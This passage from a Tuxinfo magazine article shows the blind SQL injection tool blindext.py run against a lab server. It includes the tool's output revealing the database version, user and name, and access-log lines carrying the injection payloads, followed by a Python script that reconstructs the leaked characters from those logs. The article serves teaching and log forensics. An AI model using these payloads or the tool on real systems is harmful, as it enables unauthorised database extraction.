Tuxinfo - Index of
root@hack:~/codes# ./blindext.py --info -u "192.168.0.113/buggy.phpid=1" -s "administrator"
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v3.0 |
| 7/2008 blindext.py |
| -Blind MySQL v5+ Information_schema Database Enumeration |
| -Blind MySQL v4+ Data Extractor |
| -Blind MySQL v4+ Table & Column Fuzzer |
| Usage: blindext.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://192.168.0.113/buggy.phpid=1
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 19:42:36
[0]: 5.1.49-3:root@localhost:tuxinfo
[-] 19:42:37
[-] Total URL Requests 227
[-] Done
Don't forget to check blindextlog.txt
Well, as we can see here, we obtained the following information:
We now know that the database is MySQL, version 5.1.49-3, that it runs as the user root on localhost, and that the database is tuxinfo.
With this, we can keep using the tool.
All very nice, but it filled my logs:
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25,1))>116 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>111 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>119 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>115 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26,1))>116 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
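The access-log entries above are enough for whoever reviews the server to work out what the scan learned. The following Python is an added example, not part of the original article or of blindext.py: it groups the ascii(substring(...))>N requests by character position and uses the response size as the true/false signal to recover the characters that were pinned down. It assumes the two body sizes seen in the log (268 and 432) are the only ones; the function names and the sample list, rebuilt from the entries above, are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Log lines rebuilt from the excerpt above: (position, threshold, response size).
_LINE = ('192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET /buggy.phpid=1+and+'
         'ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),'
         '{},1))>{} HTTP/1.1" 200 {} "-" "Python-urllib/2.6"')
SAMPLE = [_LINE.format(*r) for r in [
    (25, 117, 268), (25, 116, 268), (26, 63, 432), (26, 95, 432), (26, 111, 432),
    (26, 119, 268), (26, 115, 432), (26, 117, 268), (26, 116, 432),
    (27, 63, 432), (27, 95, 432)]]

# ascii(substring(<expr>,<pos>,1))><threshold>, then HTTP status and body size.
PROBE = re.compile(r'ascii\(substring\((?P<expr>.+?),(?P<pos>\d+),1\)\)>(?P<thr>\d+)'
                   r' HTTP/\S+" \d{3} (?P<size>\d+)', re.I)

def parse_probes(lines):
    """Return {position: [(threshold, response_size), ...]} for matching requests."""
    probes = defaultdict(list)
    for line in lines:
        m = PROBE.search(unquote_plus(line))  # also catches %28-style encoding
        if m:
            probes[int(m['pos'])].append((int(m['thr']), int(m['size'])))
    return dict(probes)

def bounds(probes, true_size):
    """Per position (lo, hi) with lo < code <= hi; None if the labelling contradicts itself."""
    out = {}
    for pos, reqs in probes.items():
        lo = max((t for t, s in reqs if s == true_size), default=-1)
        hi = min((t for t, s in reqs if s != true_size), default=255)
        if lo >= hi:
            return None
        out[pos] = (lo, hi)
    return out

def leaked_chars(lines):
    """Characters the logged requests determined exactly, keyed by string position."""
    probes = parse_probes(lines)
    sizes = {s for reqs in probes.values() for _, s in reqs}
    fits = [b for b in (bounds(probes, s) for s in sizes) if b]
    if len(sizes) != 2 or len(fits) != 1:  # no unambiguous two-size signal in this log
        return {}
    return {pos: chr(hi) for pos, (lo, hi) in fits[0].items() if hi == lo + 1}
```

On these entries `leaked_chars(SAMPLE)` returns `{26: 'u'}`, the 26th character of the string 5.1.49-3:root@localhost:tuxinfo in the tool output; positions 25 and 27 stay undetermined because the excerpt holds only part of their requests.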
35 www.tuxinfo.com.ar